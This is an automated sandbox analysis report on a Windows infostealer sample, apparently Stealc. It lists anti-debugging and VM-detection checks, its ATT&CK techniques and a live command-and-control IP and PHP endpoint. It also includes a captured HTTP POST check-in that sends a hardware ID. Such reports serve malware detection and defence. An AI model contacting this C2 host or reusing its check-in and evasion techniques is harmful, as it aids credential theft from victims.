                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 60F1FE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 83953C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1160 GetSystemInfo,ExitProcess,0_2_003B1160
                Source: file.exe, file.exe, 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1730462584.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1730462584.00000000010B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-13532
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-13551
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-13535
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-13547
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-13587
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B45C0 VirtualProtect ?,00000004,00000100,00000000,0_2_003B45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9750 mov eax, dword ptr fs:[00000030h] | 0_2_003C9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_003C7850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_003C9600
Source: file.exe, file.exe, 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_003C7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_003C6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_003C7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_003C7A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; the count in parentheses is the number the report shows beside a matched technique; techniques without a count had no matching signatures)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpl | file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpA | file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php0 | file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37s | file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1528602
                          Start date and time:2024-10-08 04:11:06 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 52s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 84
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
No context
No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.94766212160313
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'806'336 bytes
                          MD5:dcbcbb7abc2724683097cb469b37c429
                          SHA1:785d9b8ecba52caae4fb1bec9761d5bb1cbff066
                          SHA256:d9efe6204be6eab5b04dc98ad054b27df5661cba2a11bc508ee27711686eb918
                          SHA512:c41d531732d3c5c2efc5f2a476816c3952534521c65d96e575e404469c951a4ee70bb10fbbe74ea273c681e85fd3c15b254b90e3b0e39dce982654f02d80c521
                          SSDEEP:49152:DUq93md4tTBOhbMdvShQ0ff2/aPox1MkxqTHJonCRIH3:D340OhbMdajf2SPSek4hKX
                          TLSH:098533141A51D531E5CA47B53E93DB29A72889869E536FE6ED1D3C2988CF78CF08F0C8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0xa85000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007F76A46E166Ah
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | c218226f3fb5b724ce0165d15e640f89 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x293000 | 0x200 | dc4cce6e4f6a539d1dce2c46a9aa0a25 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gwvifbyy | 0x4f1000 | 0x193000 | 0x192e00 | 979a043ac4bda5fdcf050a6c68b1176c | False | 0.9949278137604716 | data | 7.95408378221177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nlwliywy | 0x684000 | 0x1000 | 0x400 | 9089eb8c334484dad627d1b3158649b8 | False | 0.6962890625 | data | 5.595753723108991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x685000 | 0x3000 | 0x2200 | 61dafe41f00d2ef61e1212fd5d99a174 | False | 0.06675091911764706 | DOS executable (COM) | 0.7732233544526635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T04:12:02.369390+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 04:12:01.420675993 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 04:12:01.425749063 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 04:12:01.425858021 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 04:12:01.426021099 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 04:12:01.430989027 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 04:12:02.136774063 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 04:12:02.137192965 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 04:12:02.140467882 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 04:12:02.145365000 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 04:12:02.369303942 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 04:12:02.369390011 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 04:12:05.245415926 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
• 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:12:01.426021099 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 8, 2024 04:12:02.136774063 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 02:12:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 8, 2024 04:12:02.140467882 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 34 32 35 35 33 46 35 31 36 34 34 30 32 32 33 39 31 37 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes above):
------CBGCAFIIECBFIDHIJKFB
Content-Disposition: form-data; name="hwid"

D242553F51644022391788
------CBGCAFIIECBFIDHIJKFB
Content-Disposition: form-data; name="build"

doma
------CBGCAFIIECBFIDHIJKFB--
Oct 8, 2024 04:12:02.369303942 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 02:12:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=
                          Target ID:0
                          Start time:22:11:57
                          Start date:07/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x3b0000
                          File size:1'806'336 bytes
                          MD5 hash:DCBCBB7ABC2724683097CB469B37C429
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:9.1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
                            execution_graph (rendered graph; the node dump is condensed here to the call chain it records)
                            Entry 3c69f0 -> 3b2260: roughly forty sequential calls to 3b45c0 (RtlAllocateHeap, VirtualProtect), then 3c9860.
                            3c9860: GetPEB (3c9750); LoadLibraryA x5 (3c9a93); GetProcAddress at 3c9af4, 3c9b16 (x2), 3c9b4f, 3c9b71, 3c9b92 (x2); "21 API calls" at 3c988c. Then 3c6a00 -> 3ca740 (lstrcpy at 3ca77e) -> 3b11d0.
                            3b11d0 environment checks, each with an ExitProcess branch: 3b11e8 -> ExitProcess (3b120f); GetSystemInfo (3b1160) -> ExitProcess (3b117c); GetCurrentProcess + VirtualAllocExNuma (3b1110) -> ExitProcess (3b1141); VirtualAlloc (3b10a0) with VirtualFree (3b10e2); GlobalMemoryStatusEx (3b1233 via 3c89b0) -> ExitProcess (3b1292); GetUserDefaultLangID (3c6770) -> 3c6792 -> five separate ExitProcess nodes (3c67a3, 3c67ad, 3c67b7, 3c67c1, 3c67cb) or continue at 3c67d3; 3c78e0 and 3c7850 ("3 API calls" each) -> 3b11b7 -> ExitProcess (3b11c4).
